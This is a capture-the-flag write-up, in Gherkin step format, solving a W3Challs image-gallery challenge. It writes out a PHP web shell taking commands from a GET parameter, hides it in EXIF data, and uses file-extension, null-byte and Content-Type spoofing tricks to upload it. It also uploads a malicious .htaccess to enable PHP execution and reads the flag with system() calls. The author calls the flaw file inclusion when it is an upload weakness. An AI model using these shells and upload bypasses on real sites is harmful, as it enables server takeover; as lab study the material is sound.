# language: en

Feature: Solve challenge 11
  From site W3Challs
  From Hacking Category
  With my username Skhorn

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community Edition v1.7.30
  Given a description of the challenge + access params
  """
  URL: https://w3challs.com/challenges/challenge11
  Message: An images Gallery
  Details: The flag file is located somewhere in the site three
  Description:
             - Gallery Web Site
       - Image upload form
       - Every new image uploaded it's saved in
       - a suggestions directory until it's reviewed by an admin
       - Only jpeg files are allowed to upload
  """

Scenario: Web Site Recognition
  Given the Website of the challenge:
  """
  url: http://gallery.hacking.w3challs.com/index.php
  <div class="content">
  <h1>Accueil</h1>
  <h2>Bienvenue sur la galerie d'images</h2>
  <h3>December 2042</h3>
  <p>
  Vous pouvez envoyer des images grâce au formulaire d'upload.
  Les images sont alors stockées dans le dossier
  <em><strong>suggestions</strong></em> ....
  Pour des raisons de sécurité, seuls les fichiers <em><strong>jpeg</strong>
  </em> sont acceptés.</p>
  """
  And it basically translates that anyone can upload images
  And each image will be stored in *suggestions* directory untils get reviewed
  And it only allows *jpeg* files

  Then I check the upload form:
  """
  # Upload HTML source
  url: http://gallery.hacking.w3challs.com/upload
  <form enctype="multipart/form-data" action="" method="post">
  <p><u>Formulaire d'upload</u>:<br /><br /></p>
  <table class="upload">
  <tr>
  <td>Entrez votre pseudo:</td>
  <td><input type="text" name="nick" /></td>
  </tr>
  <tr>
  <td>Image à uploader:</td>
  <td><input name="upload_file" type="file" /></td>
  </tr>
  <tr>
  <td colspan="2" class="center"><input value="Envoyer" type="submit" /></td>
  </tr>
  </table>
  </form></p>
  """
  And I start doing some checks
  """
  # Primary test with regular file: test.jpg
  # Request:
  POST /upload HTTP/1.1
  Host: gallery.hacking.w3challs.com
  ...
  ...
  Content-Type: multipart/form-data; boundary=---------------------------
  Content-Length: 36613-----------------------------
  Content-Disposition: form-data; name="nick"
  torty
  Content-Disposition: form-data; name="upload_file"; filename="test.jpg"
  Content-Type: image/jpeg
  ...JFIF...

  # Response: Le fichier test.jpg a bien été uploadé..
  """
  And I test if it's in suggestions directory
  """
  # Curl output
  skhorn@Morgul ~/D/programming> curl --output image
  http://gallery.hacking.w3challs.com/suggestions/test.jpg
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
  Dload  Upload   Total   Spent    Left  Speed
  100 36274  100 36274    0     0  36274      0  0:00:01 --:--:--  0:00:01 68570

  # xxd output
  00000000: ffd8 ffe0 0010 4a46 4946 0001 0101 0048  ......JFIF.....H
  """
  But what if I upload a file with of another type?
  Then I write this code:
  """
  # source: /expl.php
  1  <?php
  2  echo "\n";passthru($_GET['c']." 2>&1");
  3  ?>

  Which purpose is to execute commands send via get
  e.g http://...site/shell?c=<command>
  """
  And I upload it into the web site:
  """
  # Request
  POST /upload HTTP/1.1
  Host: gallery.hacking.w3challs.com
  ...
  ...
  Content-Disposition: form-data; name="nick"
  torty
  -----------------------------33487007216299804001979545185
  Content-Disposition: form-data; name="upload_file"; filename="expl.php"
  Content-Type: application/x-php
  <?php
  echo "\n";passthru($_GET['c']." 2>&1");
  ?>

  # Response
  <div class="fail">Le fichier que vous avez uploadé n'a pas la bonne extension.
  </div><br /><form enctype="multipart/form-data" action="" method="post">

  Basically says the extension is not allowed.
  """
  But what if I use something to trick it?
  And I change the extension to expl.php.jpg
  """
  # Request
  POST /upload HTTP/1.1
  Host: gallery.hacking.w3challs.com
  ...
  ...
  Content-Disposition: form-data; name="nick"
  torty
  -----------------------------20708777671156175725846521987
  Content-Disposition: form-data; name="upload_file"; filename="expl.php.jpg"
  Content-Type: image/jpeg
  <?php
  echo "\n";passthru($_GET['c']." 2>&1");
  ?>

  # Response
  <div class="succeed">Le fichier <em>expl.php.jpg</em> a bien été uploadé
  ..</div><br /><br /></p>
  """
  And it seems it got uploaded
  Then I check if the file is there:
  """
  # Curl output
  skhorn@Morgul ~/D/programming> curl
  http://gallery.hacking.w3challs.com/suggestions/expl.php.jpg
  Access denied.
  """
  Then I understand there is something else I need
  And I see this is a case of Remote File Inclusion
  And by using the Wappalyzer extesion on the browser I see it uses Apache
  And that gives me the idea that .htaccess file is resctring the execution


Scenario: Remote File Inclusion Exploitation
The File Inclusion vulnerability allows an attacker to include a file,
usually exploiting a "dynamic file inclusion" mechanisms implemented
in the target application.
This vulnerability can lead to server-side code execution, DoS, etc..
  Given I now know what kind of vulnerability is
  Then I start crafting other ways to execute foreing code
  And I start by trying to camouflage the code using the null byte exploit
  """
  # File: expl.php%00.jpg
  # Request
  POST /upload HTTP/1.1
  Host: gallery.hacking.w3challs.com
  ...
  ...
  -----------------------------2135503081259254636357957020
  Content-Disposition: form-data; name="nick"
  torty
  -----------------------------2135503081259254636357957020
  Content-Disposition: form-data; name="upload_file"; filename="expl.php%00.jpg"
  Content-Type: image/jpeg
  <?php
  echo "\n";passthru($_GET['c']." 2>&1");
  ?>
  -----------------------------2135503081259254636357957020--

  # Response
  <div class="succeed">Le fichier <em>expl.php%00.jpg</em>
  a bien été uploadé..</div><br /><br /></p>
  """
  And I see it didn't work, it seems null byte it's being check
  Then I try it in a different way, using exiftool
  """
  # Exiftool output
  skhorn@Morgul ~/D/exploits_test> exiftool -UserComment=
  '<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>' test1.jpg
  1 image files updated

  $ xxd test1.jpg
  00000000: ffd8 ffe0 0010 4a46 4946 0001 0100 0001  ......JFIF......
  00000010: 0001 0000 ffe1 00da 4578 6966 0000 4d4d  ........Exif..MM
  ...
  ...
  000000b0: 0001 ffff 0000 0000 0000 4153 4349 4900  ..........ASCII.
  000000c0: 0000 3c3f 7068 7020 6563 686f 2022 5c6e  ..<?php echo "\n
  000000d0: 223b 7061 7373 7468 7275 2824 5f47 4554  ";passthru($_GET
  000000e0: 5b63 5d2e 2220 323e 2631 2229 3b20 3f3e  [c]." 2>&1"); ?>
  000000f0: ffe2 02a0 4943 435f 5052 4f46 494c 4500  ....ICC_PROFILE.
  00000100: 0101 0000 0290 6c63 6d73 0430 0000 6d6e  ......lcms.0..mn
  00000110: 7472 5247 4220 5859 5a20 07df 000b 0018  trRGB XYZ ......
  00000120: 0011 000f 0035 6163 7370 4150 504c 0000  .....5acspAPPL..
  """
  And I upload the file
  """
  # Uploading file modified by exiftool
  # Response
  POST /upload HTTP/1.1
  Host: gallery.hacking.w3challs.com
  -----------------------------18022016213193675841753537945
  Content-Disposition: form-data; name="nick"
  torty
  -----------------------------18022016213193675841753537945
  Content-Disposition: form-data; name="upload_file"; filename="test1.jpg"
  Content-Type: image/jpeg
  ...<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>...

  # Response
  <p>
  <div class="succeed">Le fichier <em>test1.jpg</em>
  a bien été uploadé..</div><br /><br /></p>
  """
  Then I look if it got uploaded
  """
  # Extracting file
  skhorn@Morgul ~/D/exploits_test> curl --output image
  http://gallery.hacking.w3challs.com/suggestions/test1.jpg
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
  Dload  Upload   Total   Spent    Left  Speed
  100 18356  100 18356    0     0  18356      0  0:00:01 --:--:--  0:00:01 24474

  Although it got into the directory, it doesn't execute it
  """
  And definitively, .htaccess is the target
  And if I manage to upload it, it will rewrite the content of the current
  But the methods I have used won't allow me to do it

  Then I use something I read while searching about RFI
  And it was about changing the Content-Type Header during request
  And this tricks could trick the function cheking the file
  Then I start by creating the .htaccess I will upload
  """
  # Crafted .htaccess content
  Options +Indexes
  AddType application/x-httpd-php .php

  Options +Indexes: List directory
  AddType app: Allows execution of php files under the given extension names
  e.g .php in this case
  """
  And I upload it
  """
  # Request sending .htaccess
  POST /upload HTTP/1.1
  Host: gallery.hacking.w3challs.com
  ...
  ...
  Content-Disposition: form-data; name="nick"
  torty
  -----------------------------14177994671638178617342223806
  Content-Disposition: form-data; name="upload_file"; filename=".htaccess"
  Content-Type: application/octet-stream
  Options +Indexes
  AddType application/x-httpd-php .php

  # Modifying Content-Type of file
  Original: Content-Type: application/octet-stream

  Modified: Content-Type: image/jpeg

  # Response
  <div class="succeed">Le fichier <em>.htaccess</em>
  a bien été uploadé..</div><br /><br /></p>
  """
  And it was succesful!
  Then I check if the file is there
  """
  # Extracting .htaccess
  skhorn@Morgul ~/D/exploits_test> curl
  --output ht http://gallery.hacking.w3challs.com/suggestions/.htaccess
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
  Dload  Upload   Total   Spent    Left  Speed
  100   230  100   230    0     0    230      0  0:00:01 --:--:--  0:00:01   395

  # Checking file content
  skhorn@Morgul ~/D/exploits_test> cat ht
  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  <html><head>
  <title>403 Forbidden</title>
  </head><body>
  <h1>Forbidden</h1>
  <p>You don't have permission to access /suggestions/.htaccess
  on this server.<br />
  </p>
  </body></html>
  """
  And this is the normal behaviour
  But what if I visit suggestions directory on browser?
  """
  url: http://gallery.hacking.w3challs.com/suggestions/
  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  <html>
   <head>
     <title>Index of /suggestions</title>
    </head>
     <body>
     <h1>Index of /suggestions</h1>
     <pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a>
     ...
     ... <a href="expl.php%2500.jpg">expl.php%00.jpg</a>
     ... <a href="expl.php.jpg">expl.php.jpg</a>
     ... <a href="test.jpg">test.jpg</a>
     ... <a href="test1.jpg">test1.jpg</a>
     <hr></pre>
     </body></html>
  """
  And in fact it worked! It's listing the files I uploaded before
  Then I upload another file, this time, the shell script
  And using the same headers modification
  """
  # source: /shell.php
  1  <?php
  2  print system("ls ../*");
  3  ?>

  # Request:
  POST /upload HTTP/1.1
  Host: gallery.hacking.w3challs.com
  ...
  ...
  -----------------------------19403077121123978164506280755
  Content-Disposition: form-data; name="nick"
  torty
  -----------------------------19403077121123978164506280755
  Content-Disposition: form-data; name="upload_file"; filename="shell.php"
  Content-Type: application/x-php
  <?php
  print system("ls ../*");
  ?>
  -----------------------------19403077121123978164506280755--

  # Modifying Content-Type header
  Original: Content-Type: application/x-php

  Modified: Content-Type: image/jpeg

  # Response
  <div class="succeed">Le fichier <em>.htaccess</em>
  a bien été uploadé..</div><br /><br /></p>
  """
  Then I execute it, by visiting the file on the browser
  """
  # Command execution output:
  ../basic.css
  ../index.php
  ../lang.php

  ../css:
  index.html
  lightbox.css

  ../js:
  effects.js
  lightbox.js
  prototype.js
  scriptaculous.js

  ../lang:
  en.php
  fr.php

  ../omg_secret_wut:
  flag

  ../suggestions:
  expl.php%00.jpg
  expl.php.jpg
  test.jpg
  test1.jpg
  """
  And Voila! It's listing the content of the ls command
  And by looking at the listing, I see where the flag is located
  Then I upload another shell
  And within this code:
  """
  # source: shell.php
  <?php
  print system("cat ../omg_secret_wut/flag");
  ?>
  """
  And then I upload it by using the same method described above
  And I check the output of it in browser
  And I get flag file content:
  """
  Well done! Flag is ...
  """
  Then I complete the challenge
